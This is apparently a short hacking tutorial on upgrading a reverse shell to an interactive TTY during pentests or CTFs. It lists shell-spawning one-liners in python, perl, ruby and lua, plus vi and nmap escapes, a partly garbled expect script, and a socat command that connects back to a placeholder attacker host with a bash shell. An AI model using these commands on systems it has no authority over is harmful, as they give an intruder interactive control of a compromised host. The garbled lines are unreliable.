Reverse TTY Shells
Reverse TTY Shells

Reverse shell during a Hacking / Pentesting exercises or solving some CTF challenge is great, it feels like we are almost there. But than discovering the limitation we feel like What the… We need a more interactive shell. So here is small guide to get beyond and spawning TTY Shells while hacking.

Limitation of not having TTY

cannot use interactive commands like su, ssh, nano
Text editors not supported with all glory
no job control
no tab complete or up arrow complete
and more…..

So we want to overcome the limitations with a TTY shell. Yes many times the capabilities depend on other system variables so we give a number of method which should work in different environments.

Using Python pty module

This is by far the most popular method. The target server should have python installed. Python pty module will let you spawn PTY Pseudo- Terminal which fools commands like su that it is being run in proper terminal. Always spawn /bin/bash instead of /bin/sh

$ python -c 'import pty; pty.spawn("/bin/bash")'

So this was from Python, we will see few more methods to spawn a TTY shell.

python -c 'import pty; pty.spawn("/bin/bash")' and then export TERM=linux
echo os.system('/bin/bash') 
/bin/sh -i 
perl —e 'exec "/bin/sh";' 
perl: exec "/bin/sh"; 
ruby: exec "/bin/sh" 
lua: os.execute('/bin/sh') 
(From within IRB) exec "/bin/sh" 
(From within vi) :!bash 
(From within vi) :set shell=/bin/bash:shell 
(From within nmap) !sh

Using expect

Don’t expect all servers to have expect, in case you are lucky enough below are the commands to get a TTY shell.

expect -v
 expect version 5.45.4
$ cat > /tmp/ <<EOF
spawn bash

$ chmod u+x /tmp/
$ /tmp/

Using socat

socat can be used to pass a full TTY on TCP connection, again same as above if you are lucky enough to have this on server.

Setup socat listner on you (attacker machine replacing the port number with your listening port.

socat -,raw,echo=0 tcp-listen:7777

Now on the victim machines connect back to attacker, changing the <attacker host> and <listening port>

$ socat exec:"/bin/bash -li",pty,stderr,setsid,sigint,sane tcp:<attacker host>:<listening port>

This article is just a small trick or say help or call whatever that comes handy when hacking, we will cover many more such small helping articles that will build a good knowledge of hacking . These are often used in real world hacking or CTFs. I will try adding more to these basics soon.


Please enter your comment!
Please enter your name here